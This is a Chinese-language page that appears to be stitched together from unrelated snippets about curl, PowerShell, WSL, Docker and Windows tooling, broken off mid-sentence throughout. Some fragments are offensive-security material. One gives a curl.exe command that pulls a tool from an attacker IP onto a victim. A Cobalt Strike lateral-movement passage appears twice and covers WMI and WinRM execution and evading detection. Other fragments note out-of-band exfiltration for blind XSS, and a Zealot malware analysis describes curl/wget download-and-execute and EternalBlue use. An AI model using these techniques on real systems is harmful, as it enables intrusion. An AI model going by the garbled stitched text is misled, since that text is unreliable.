介绍 你用过 Curl 吗?...这个工具允许你通过 http 来发送数据,现在有一个适用于gGRPC的工具,gRPCurl,在本文中,我将介绍如何下载安装这个工具,然后通过这个工具调试我们.NET 5上面的gGRC程序。 ?...安装完GO环境以后,还需要设置 Windows环境变量,然后使用管理员身份打开PowerShell,运行下边两个命令: go get github.com/fullstorydev/grpcurl/.....我将向您展示如何使用反射,因为这是.NET中最简单的方法,为了能够使用Reflection,使用以下命令安装: Install-Package Grpc.AspNetCore.Server.Reflection...总结 这是gRPCurl的简单教程, gRPCurl具有很多功能,如果您想了解更多信息, 我建议你可以在这里找到更多的api,https://github.com/fullstorydev/grpcurl
此外,我还在攻击者计算机上保留了一个 Windows 漏洞利用文件夹,其中包含我使用的所有常见漏洞利用和 PowerShell 脚本。...要使用curl.exe将文件下载到受害者上,请使用以下命令: curl.exe 172.16.1.30/wget.exe -o C:\temp\wget.exe 我特意下载了wget.exe来表示可以…...这种技术也很酷,因为 TXT 文件必须在受害者身上制作。这样就不需要传输文件才能传输文件 - 因为这是多余的!...但是,传输只需要几秒钟(如果是大文件,可能会更长),因此为了安全起见,让提示挂起大约一分钟,然后使用CTRL + C取消攻击者端的连接。...最重要的是,这是不需要下载文件或将文件传输给受害者来完成的。 如果您的 EXE 和 PS1 脚本位于同一目录中,则为两个开关设置相同的目录。
一开始开了很多docker服务,之后因为使用不频繁,也删掉了许多。 我也意识到,如果以后要打比赛的话,还是得用wsl,因为到时候可能会断网。 这一些因素都让我决定重装系统。...下载微软最新ISO镜像 我的u盘里装着ventory,它可以在机器u盘启动的时候,选择众多iso文件中选择一个进行启动。 所以我只需要下载windows 最新的iso文件即可。...激活windows 因为这台主机肯定是没有自带激活的,不像我们的笔记本,出场的时候有正版windows会自动激活。 这里我使用了github上的一个工具。...让powershell使用sudo,可以用winget安装gsudo这个工具。...的powershell配置文件精简了一下,去掉了我平时用不到的功能。
在Windows的PowerShell这样的环境中,当用户输入curl时,命令行系统可能会优先使用其他工具代替curl。...要想在PowerShell中正确使用curl,需要输入它的全名,包括扩展名:“curl.exe”。 不同的命令行系统允许的最大命令行长度也不相同,并强制用户限制单个命令行的数据量。...对于一些选项,你需要向它们传递一些数据,如用户名或文件路径。你需要先指定选项,然后给出参数,中间用空格分隔。例如,可以通过HTTP POST将一个字符串发送给服务器。...如果字符串本身包含了双引号,比如想要向服务器发送JSON字符串(这种情况很常见),你可能需要使用单引号(但在Windows系统上使用单引号可能不行)。...curl -d '{ "name": "Darth" }' http://example.com 如果想要避免使用单引号,则可以通过文件将数据传给curl,这样就无须使用额外的引用。
这与使用添加到$ PATH的UNIX工具子集的Git Bash或cmder等终端不同。这实际上就像在Windows上运行可以执行本机Linux应用程序的完整Linux内核。那真是太棒了,不是吗?...使用开源技术构建项目时,您可能会遇到在Linux上运行良好但在Windows上不完全支持的依赖项。...其他Ubuntu选项允许您安装较旧的受支持版本。 ? 安装完成后,您需要从菜单中启动它。由于这是第一次,您需要等待Ubuntu映像下载并安装在您的计算机上。这是一次性步骤。...就我而言,我正在升级: ? 安装完成后,您可以从“开始”菜单启动它。您将找到的默认终端是PowerShell。只要单击+号,就会使用默认终端创建一个新选项卡。使用下拉菜单,您可以选择其他类型的终端。...我想展示的一个简单提示是像我这样安装了旧版Windows终端的用户。你们中的一些人可能已经注意到上面的截图中缺少一些配置文件。尽管更新了应用程序,但我的个人资料设置保持不变。
这一步相对复杂,我也不打算多说…… 因为真不是必要的,除非你也有古老的项目需要支持 下一步就是去下载 VS 了,我使用的是专业版来进行构建,和微软的销售聊了,其实不需要使用企业版来作为构建服务器的构建工具.../dotnet-docker 基本只需要找对系统然后抄代码就可以了 只是因为我这边的运营商很小气,很难将文件拉下来,因此就需要在外面将 dotnet 和 PowerShell 拉下来,然后将 curl...远程下载的逻辑替换为使用本地的文件 这里我使用dotnet职业技术学院的下载库制作的下载器进行下载,这是一个在 GitHub 完全开源的仓库,请看 https://github.com/dotnet-campus...curl 下载的逻辑替换为使用本地文件,使用本地文件也就是不需要下载就可以了,因为文件在第一步就从本地复制,请看下面 # Install .NET SDK # 不从 https://dotnetcli.azureedge.net...GDI+ 的库 可以看到搭建 docker 的步骤比虚拟机的步骤多太多了,但这是因为我不能拉官方的 docker 来用而已,如果能拉官方的,那就只需要两句话就完成了 我在做 docker 服务器的时候
我不能用官方的镜像,因为我需要在小伙伴构建的 debian 镜像上面安装 dotnet sdk 用来做构建,其实在 docker 里面需要找到一个个文件,然后复制代码 这是小伙伴做的一个 jenkins...的镜像 jenkins/slave 我需要在这个镜像基础上安装 dotnet 进行构建 FROM jenkins/slave 在安装 dotnet 之前需要通过官方 https://github.com...:buster-scm 需要找到 buildpack-deps:buster-scm 的代码 找到这个库的代码 https://github.com/docker-library/buildpack-deps...rc.2.nupkg 放在 docker 文件相同文件夹 接下来是复制 dotnet 的代码 # https://raw.githubusercontent.com/dotnet/dotnet-docker...欢迎转载、使用、重新发布,但务必保留文章署名林德熙(包含链接: https://blog.lindexi.com ),不得用于商业目的,基于本文修改后的作品务必以相同的许可发布。
这是一个免费的商业化合物虚拟筛选数据库。ZINC包含超过7.5亿种可购买的化合物,其中,2.3亿化合物是即下即用的3D格式文件。...里面有各种方式URL,cURL,WGET,Powershell。一般到这里就方了,别急,一个一个来。 ? 首先,我把这些全部下载下载。 ?...(1)curl 文本内容:linux下我就直接sh了,win下的话,在你电脑上有curl的前提下,把这个文件的后缀名改为bat,然后双击运行就是这么简单。...打开powershell,将后缀为powershell的文件重命名为ps 1.然后再powershell模式下启动,命令行为 ....(3)wget 文本内容:linux下我就直接sh了,win下的话,在你安装好wget的前提下,把这个文件的后缀名改为bat,然后双击运行就是这么简单。
3.带外数据 传输层协议使用带外数据(out-of-band,OOB)来发送一些重要的数据,如果通信一方有重要的数据需要通知对方时,协议能够将这些数据快速地发送到对方。...为了发送这些数据,协议一般不使用与普通数据相同的通道,而是使用另外的通道。linux系统的套接字机制支持低层协议发送和接受带外数据。但是TCP协议没有真正意义上的带外数据。...由于TCP协议每次只能发送和接受带外数据一个字节,所以,我们可以通过设置一个数组,利用发送数组下标的办法让服务器程序能够知道自己要监听的端口以及要连接的服务器IP/port。...我们在做渗透测试的时候,经常会遇到这种情况,测试跨站可能有些功能插入恶意脚本后无法立即触发,例如提交反馈表单,需要等管理员打开查看提交信息时才会触发,或者是盲注跨站,盲打 XSS 这种。...1.2 缺点:对于不出网服务器没有办法传输,同时需要了解其返回包字段信息,需要使用返回包字段将回显信息带出2.对于不出网机器 使用DNS传输,ICMP传输,powershell中的wget,curl等传输
问题是它会创建服务并运行base64编码的命令,这是不正常的,并且会引发各种警报并生成日志。 另外,发送的命令是通过命名管道发送的,该管道在CS中具有默认名称(可以更改)。...的payload,因此使用内置WMI时PowerShell.exe将打开,这是OpSec问题,因为执行的是base64编码的负载。...这是服务器操作系统的例外,因为自2012R2及更高版本开始默认启用。 WinRM需要客户端上的侦听器(听起来熟悉吗?),即使启动了WinRM服务,也必须存在一个侦听器,以便其处理请求。...使用WebDAV 将XML文件托管在不需要身份验证的SMB共享上(例如,使用Impacket的SMBServer.py,但很可能要求攻击者在网络上拥有攻击机器) 尝试其他类似的“ ExecuteShellCommand...,您可以生成自己的二进制文件,而不是使用Cobalt Strikes内置插件(可能更隐秘)。
Git现在是一个基本的技能,就像穿鞋或拼写检查一样。 SSH:是的,我知道,你是一个Windows开发人员,你不需要使用那个讨厌的shell。但是,你需要使用它来创建SSH密钥或使用其他SSH功能。...AWS已经变得非常之大,你甚至都无法全面地了解AWS,但你至少需要了解一下EC2。 JavaScript:如果一个产品或工具需要添加脚本类型的API,那很可能就是JavaScript。...另外,增加一个像grep(PowerShell中等效的工具是Select-String)这样的工具,这两个工具的功能会变得更强大。 MongoDB:你至少需要知道一个文档数据库的使用方法。...另外还有像Postman这样的GUI工具可以完成同样的工作,但一个认真负责的开发人员需要能够通过使用点选式的界面来提高效率。 Markdown:这是GitHub中README.md文件的格式。...通过这个基本的标记语言,你可以输出幻灯片、PDF和HTML格式的文件。通常,这些输出格式可以通过CSS或其他方式进行格式化。
, 1.3 的步骤无需操作 直接 powershell 执行 wsl –install -d Ubuntu-20.04 即可 通过 chrome 或者 IDM 输入 https://aka.ms/wslubuntu2004...下载安装包, chrome 可能会提示未经验证, 直接无视后保存即可 或者执行如下 powershell 命令下载 cd D:\ Invoke-WebRequest -Uri https://aka.ms.../wslubuntu2004 -OutFile Ubuntu.appx -UseBasicParsing # 或者使用 curl 下载 curl.exe -L -o ubuntu-2004.appx https...://aka.ms/wslubuntu2004 将下载后的文件后缀直接改为 zip, , 再将 x64 的 appx 文件后缀改成 zip, 将此 zip 解压到指定目录, 此目录就是后续 ubuntu...存放数据的地方, 我这里放到了 D:\ubuntu 目录 最后执行解压后的 exe 进行安装, 按照提示设置账号密码即可 cd D:\ubuntu .
[TOC] Beats 收集、解析和发送组件 winlogbeat - 简述与使用 描述: 我们可以利用 Winlogbeat 来进行 Windows 日志监视,大致流程是在要监视的每个系统上安装Winlogbeat...指定日志文件的位置将日志数据解析为字段并发送到Elasticsearch可视化Kibana中的日志数据。...安装流程: Step 1.从下载页面下载Winlogbeat zip文件,并解压至任意目录此处我解压到d:\logs\目录之中然后再重命名winlogbeat-目录为Winlogbeat...Windows PowerShell Step 5.保存配置文件后,使用以下命令对其进行测试,并Winlogbeat加载附带用于解析、索引和可视化数据的预定义资产。...- name: Windows PowerShell # - 必须在配置文件中指定通道的全名。
我后来突然意识到。是像虚拟机快照那样吗?会把当时的容器状态全都打包进去吗?还是说只是单纯的打包一下当时的文件?...在构建上下文中使用的 Dockerfile 文件,是一个构建指令文件。为了提高构建性能,可以通过.dockerignore文件排除上下文目录下不需要的文件和目录。...目标路径不需要事先创建,如果目录不存在会在复制文件前先行创建缺失目录。 此外,还需要注意一点,使用 COPY 指令,源文件的各种元数据都会保留。比如读、写、执行权限、文件变更时间等。...如,当镜像被使用时,可能需要做一些处理: [...] ONBUILD ADD ....,Windows 下通常会有 cmd 和 powershell 两种 shell,可能还会有 sh。
也许老的DOS系统的帮助的经历,让我们不太愿意再求助内置的帮助,但是,难道我需要建议大家都使用互联网的搜索来得到吗?幸好,这个现象没有在Powershell中出现。...Powershell的帮助有很多很有趣的开发,比如-full和-example, 一般来说-examples也可以工作,这是在Powershell里面非常少见的一个名词的复数。...我的经验之谈 对于初学者而言,Powershell的帮助是最爱;然而对于中级高手而言,却会忽略掉Powershell帮助;对于大师而言,他又会回归到使用get-member。...我的经验是,通过输入get-hep foreach你不能直接的得到帮助,但是你可以通过直接读该文件而得到大量帮助信息 $PSHome\about_foreach.help.txt ?...你可能也知道了,tab键的自动完成不但对某个命令起作用,对于所有的命令都起作用。 同样,当你使用Powershell的参数的时候,你也可以使用相同的自动填写功能。
捍卫者心中的问题是“这是怎么发生的?”。 攻击通常从向一个或多个用户发送鱼叉式网络钓鱼电子邮件开始,使攻击者能够让他们的代码在目标网络内的计算机上运行。...您可能会认为,使用已发布的补丁程序阻止管理员将凭据放入组策略首选项中,这将不再是问题,尽管在执行客户安全评估时我仍然在 SYSVOL 中找到凭据。...这是理想的,也是微软正在将 RDP 转向管理员模式的原因。有一种方法可以通过 PowerShell 远程处理连接到远程系统,并且能够通过 CredSSP 使用凭证。问题是 CredSSP 不安全。...原因是,默认情况下,PowerShell 远程处理使用“网络登录”进行身份验证。网络登录通过向远程服务器证明您拥有用户凭证而不将凭证发送到该服务器来工作(请参阅Kerberos和NTLM身份验证)。...通过对虚拟化主机的管理员权限,可以克隆虚拟 DC 并离线复制相关数据。 获取对虚拟 DC 存储数据的访问权限,并有权访问域凭据。你运行 VMWare 吗?
此外,发送的命令是通过命名管道发送的,命名管道在 CS 中有一个默认名称(但可以更改)。Red Canary写了一篇很棒的文章来检测它。...有效负载,因此 PowerShell.exe 将在使用 WMI 内置时打开,这是一个 OpSec 问题,因为执行的是 base64 编码的有效负载。...如果您使用远程术语,则需要通过 DCOM 或 WMI 完成。...使用 WebDAV 将 XML 文件托管在不需要身份验证的 SMB 共享上(例如,使用Impacket 的 SMBServer.py,但很可能需要攻击者将攻击机器连接到网络上) 尝试其他类似的“ExecuteShellCommand...远程文件上传 您可以生成自己的二进制文件,而不是使用内置的 Cobalt Strikes,后者(可能)更加隐蔽。
可能的枚举值为“Ssl3、Tls”。...这可能是因为您正在使用的 .NET Framework 或 PowerShell 的版本过低。 在 PowerShell 中,TLS 1.2 由 .NET Framework 提供支持。....您可以通过以下命令查看当前 PowerShell 使用的 .NET Framework 版本: #ps1 $PSVersionTable.CLRVersion 如果您的 .NET Framework 版本低于...4.5,或者您的 PowerShell 版本低于 3.0,那么您将无法使用 TLS 1.2。...升级 PowerShell 到 3.0 或更高版本。 如果您无法升级,那么您可能需要将 SecurityProtocol 设置为您的环境支持的值,如 Ssl3 或 Tls。
微软原版从Server2019才开始有curl.exe的,Server2019以前的系统里如果有curl.exe肯定是人为集成的,如果集成的curl.exe版本较低,curl.exe https url...时可能会报证书错误,详见我这篇文档:https://cloud.tencent.com/developer/article/2396655 windows curl命令官网:https://curl.haxx.se.../windows/ 安装后需要添加环境变量 Windows curl跟Linux curl在引号的处理上稍有区别 Windows上curl post json请求格式跟linux上不一样,linux...要用单引号,Windows要用双引号且里面的双引号要转义 另外,请注意,高版本Windows的powershell有curl缩写,如果你直接在powershell里敲curl调用的是系统本身的那个命令,...我之前写powershell代码时就踩过坑,后来我学乖了在curl后面加了.exe(我配环境变量了,所以省去了绝对路径),避免跟powershell里的curl缩写冲突。
如果失败,Zealot将使用“curl”和“wget”工具下载并执行一个名为“larva”的文件,然后立刻删掉。...图3 测试机器是否感染 然后它会使用同样的下载和执行技巧,捕捉一个名为“mule”的文件,这是一个加密货币挖矿机的恶意软件。...然后下载主要的python 模块(“probe.py”),将感染传入内网。该脚本使用“pyminifier”进行混淆,这是一个Python代码最小化,混淆和压缩的公共包。...图14 Windows 8 的shellcode包含编码过的Powershell代码 与EternalBlue漏洞利用使用外部文件作为他们的shellcode不同,EternalSynergy 漏洞利用有内置...图15 Mule 恶意矿机的值 Leveraging Off-the-Shelf Tools Zealot攻击者使用了公共EmpireProject,这是一个PowerShell和Python 漏洞利用后期代理
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
腾讯会议
对象存储
云直播
